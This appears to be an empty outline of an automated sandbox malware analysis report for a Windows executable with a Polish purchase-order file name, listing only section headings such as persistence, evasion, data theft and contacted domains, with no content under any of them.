Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Malware Threat Intel
Provided by